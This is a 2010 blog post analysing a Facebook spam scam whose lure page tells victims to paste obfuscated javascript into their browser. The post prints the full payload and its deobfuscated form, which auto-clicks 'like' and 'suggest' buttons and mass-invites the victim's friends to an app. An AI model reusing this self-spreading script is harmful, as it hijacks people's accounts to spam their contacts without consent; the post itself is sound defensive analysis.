Monday, May 17, 2010

Facebook Spam

3 days ago I received an email from Facebook team sent by my old friend who I haven't met since after University graduation. I was abit curious about what he wanted to send me (To be honest I was attracted by the email subject ^_^):


But unfortunately I can't give you the screenshot on how the page really looks like. The page is actually a couple that hugged together naked but of course the important parts are all hidden :). I know someone cannot imagine it by words but please use your creative imagination ;)

Beside this, the main part of this scammer is it includes a combo box with javascript text inside and also instructions on how to copy and paste the javascript code to your browser so that you can see this naked couple. The script looks like this:

javascript:(function(){a='app118802484821085_YCbbZr';b='app118802484821085_ZKOHsY';qDDgEj='app118802484821085_qDDgEj';ZsMtqA='app118802484821085_ZsMtqA';nQMzbQ='app118802484821085_nQMzbQ';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x7 \2|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6
x78|x2E|x44|document|nQMzbQ|fs|SocialGraphManager|ZsMtqA|qDDgEj|||||||'.split('|'),0{}))})();

By looking at this obfuscated javascript code, I decided not to believe my friend and tried to debug the script and see what it actually does. Here is the result of after the deobfuscation of the first layer obfuscation:


var _0x95ea=[\"\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79\",\"\x73\x74\x79\x6C\x65\",\"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\",\"\x68\x69\x64\x64\x65\x6E\",\"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C\",\"\x76\x61\x6C\x75\x65\",\"\x73\x75\x67\x67\x65\x73\x74\",\"\x6C\x69\x6B\x65\x6D\x65\",\"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73\",\"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74\",\"\x63\x6C\x69\x63\x6B\",\"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74\",\"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74\",\"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C\",\"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D\",\"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\",\"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67\"];
d=document;
d[_0x95ea[2]](nQMzbQ)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);
d[_0x95ea[2]](ZsMtqA)[_0x95ea[4]]=d[_0x95ea[2]](qDDgEj)[_0x95ea[5]]},5000);

It is fairly easy now to understand what the script does. After replacing the array element _0x95ea, the final script will look like this:

a='app118802484821085_YCbbZr';
b='app118802484821085_ZKOHsY';
qDDgEj='app118802484821085_qDDgEj';
ZsMtqA='app118802484821085_ZsMtqA';
nQMzbQ='app118802484821085_nQMzbQ'
var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest", "likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form", "/ajax/social_graph/invite_dialog.php","submitDialog"];
d = document;
d['getElementById'](nQMzbQ)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
setTimeout(function () {
fs['select_all']()
}, 5000);
setTimeout(function () {
SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
m['dispatchEvent'](c);
d['getElementById'](ZsMtqA)['innerHTML'] = d['getElementById'](qDDgEj)['value']
}, 5000);

It seems to be a javascript function that utilizes FBML (Facebook Markup Language) that will suggest a defined application to all your friends in your friend's list.

@Lucas, if you see this please check your machine. Your machine is potentially compromised and infected!

Signing off
~x9090